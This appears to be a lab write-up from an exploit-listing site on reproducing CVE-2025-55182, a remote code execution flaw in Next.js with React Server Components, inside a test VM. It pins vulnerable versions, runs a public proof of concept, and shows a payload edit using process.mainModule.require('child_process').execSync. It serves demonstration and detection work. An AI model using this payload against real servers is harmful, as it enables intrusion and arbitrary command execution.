Share
## https://sploitus.com/exploit?id=C765384D-0A5B-5B19-8FF0-8B4BA9DD609E
# CVE-2025-55182 Demonstration Lab (Next.js / React RSC RCE)
This document provides a complete and reproducible setup for demonstrating CVE-2025-55182 Remote Code Execution (RCE) against a vulnerable Next.js + React Server Components environment running inside a Multipass Ubuntu VM.
The exploit is executed **from outside the VM**, proving remote exploitability and preparing the environment for anomalous behavioral detection.
Source: https://github.com/ejpir/CVE-2025-55182-research
---
## 1. Create and Prepare the Ubuntu VM
## 2. Basic Setup Inside the VM
### 2.1 Update system and install dependencies
```bash
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential
```
### 2.2 Install Node.js LTS (20.x)
```bash
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs
```
Verify:
```bash
node -v
npm -v
```
### 2.3 Create a dedicated user for the app
```bash
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab
```
---
## 3. Deploy the Vulnerable Next.js App
### 3.1 Create working directory
```bash
mkdir ~/react2shell-lab
cd ~/react2shell-lab
```
### 3.2 Generate a barebones Next.js App Router project
```bash
npx create-next-app@latest vulnerable-app
cd vulnerable-app
```
### 3.3 Pin vulnerable versions in `package.json`
Edit dependencies:
```json
"dependencies": {
"next": "16.0.0",
"react": "19.1.0",
"react-dom": "19.1.0"
}
```
Reinstall packages:
```bash
rm -rf node_modules package-lock.json
npm install
```
Verify:
```bash
npm list react react-dom next
```
Expected:
```
react@19.1.0
react-dom@19.1.0
next@16.0.0
```
### 3.4 Build and run in production mode
```bash
npm run build
npm start
```
Expected output:
```
▲ Next.js 16.0.0
Local: http://localhost:3000
Network: http://10.X.X.X:3000
```

---
## 4. Confirm External Accessibility (Attacker Machine → VM)
On another machine:
```bash
curl http://10.102.169.126:3000
```
You should receive the default Next.js HTML page.
---
## 5. Clone and Test the PoC on the Attacker Machine
### 5.1 Clone repository
```bash
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research
```
### 5.2 Point PoC to the server IP
Find:
```js
hostname: 'localhost',
```
Replace with:
```js
hostname: '10.X.X.X',
```
### 5.3 Run baseline PoC (simple console.log RCE)
With Next still running:
```bash
node test-simple.cjs
```
Expected in the Next.js terminal:
```
NON-CHUNKED-RCE
```
This confirms **remote code execution via React Flight** using the vulnerable versions.

---
## 6. Modify the PoC to Perform a Visible Side‑Effect (File Creation)
The goal is to generate observable behavior (filesystem + process execution).
### 6.1 Edit `_prefix` inside `test-simple.cjs`
Locate:
```js
"_prefix": "console.log('NON-CHUNKED-RCE');//"
```
Replace with:
```js
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"
```
Note: `require` is not available in the execution context, but `process.mainModule.require()` is.
### 6.2 Test modified exploit
Ensure Next is running, then:
```bash
node test-simple.cjs
```
Check file creation:
```bash
ls -l /tmp/
```
You should see:
```
cve-2025-55182-syscall
```
This confirms functional RCE with side effects.

---
Patch:
React ≥ 19.2.1
Next.js ≥ 16.0.7